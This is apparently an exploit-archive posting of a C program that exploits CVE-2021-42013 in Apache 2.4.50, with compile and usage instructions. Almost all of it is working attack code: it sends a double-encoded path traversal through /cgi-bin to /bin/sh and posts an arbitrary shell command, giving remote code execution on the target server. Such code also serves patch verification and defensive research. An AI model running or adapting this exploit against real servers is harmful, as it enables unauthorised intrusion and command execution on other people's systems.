Apache 2.4.50 Remote Code Execution

Apache version 2.4.50 remote code execution exploit that leverages a traversal as identified in CVE-2021-42013. Written in C.


SHA-256 | 64d8677bc7be110891aa555bf10e259d5602cd7d458c4a59da80719f277ba28b

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <curl/curl.h>

/* Apache 2.4.50 exploit (CVE-2021-42013)
* Author: Vilius Povilaika
* Website: www.povilaika.com */

// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013

int usage(char* prog)
{
printf("Usage: %s <host> <exec>\n", prog);
printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog);
return 0;
}

bool error(const char* reason)
{
printf("[ERR] Critical error - %s\n", reason);
return false;
}

struct callback_result {
char* data;
size_t size;
};

static size_t callback(void* pointer, size_t size, size_t nmemb, void* data)
{
struct callback_result *memory = (struct callback_result *)data;
char* ptr = realloc(memory->data, memory->size+nmemb+1);
memory->data = ptr;
memcpy(&(memory->data[memory->size]), pointer, nmemb);
memory->size += nmemb;
memory->data[memory->size] = 0;
return nmemb;
}

bool exploit(void* result, char* host, char* exec)
{
CURL *curl = curl_easy_init();
char url[256];
sprintf(url, "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host);
curl_easy_setopt(curl, CURLOPT_URL, url);
char payload[256];
sprintf(payload, "echo Content-Type: text/plain; echo; %s", exec);
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);
int res = curl_easy_perform(curl);
if (res != CURLE_OK)
return error(curl_easy_strerror(res));
curl_easy_cleanup(curl);
return true;
}

int main(int argc, char* argv[])
{
if (argc != 3)
return usage(argv[0]);
struct callback_result result = {0};
bool res = exploit(&result, argv[1], argv[2]);
if (res)
printf("[+] Exploit finished successfully, check output\n");
else
printf("[-] Exploit failed, check output\n");
printf(" \n%s\n", result.data);
return 0;
}

Related Posts